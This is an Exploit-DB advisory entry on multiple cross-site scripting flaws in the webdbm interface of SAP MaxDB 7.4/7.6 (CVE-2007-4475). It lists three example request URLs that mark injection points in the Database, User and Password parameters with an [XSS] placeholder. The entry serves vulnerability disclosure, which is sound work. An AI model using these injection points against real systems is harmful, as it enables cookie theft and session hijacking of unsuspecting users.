SAP MaxDB 7.4/7.6 - 'webdbm' Multiple Cross-Site Scripting Vulnerabilities

2009-03-31T00:00:00
ID EDB-ID:32879
Type exploitdb
Reporter Digital Security Research Group
Modified 2009-03-31T00:00:00

Description

SAP MaxDB 7.4/7.6 'webdbm' Multiple Cross Site Scripting Vulnerabilities. CVE-2007-4475. Remote exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/34319/info

SAP MaxDB is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 

http://example.com:9999/webdbm?Event=DBM_LOGON&Action=VIEW&Server=&Database=[XSS]
http://example.com:9999/webdbm?Event=DBM_LOGON&Action=VIEW&Server=&User=[XSS]
http://example.com:9999/webdbm?Event=DBM_LOGON&Action=VIEW&Server=&Database=&User=&Password=[XSS]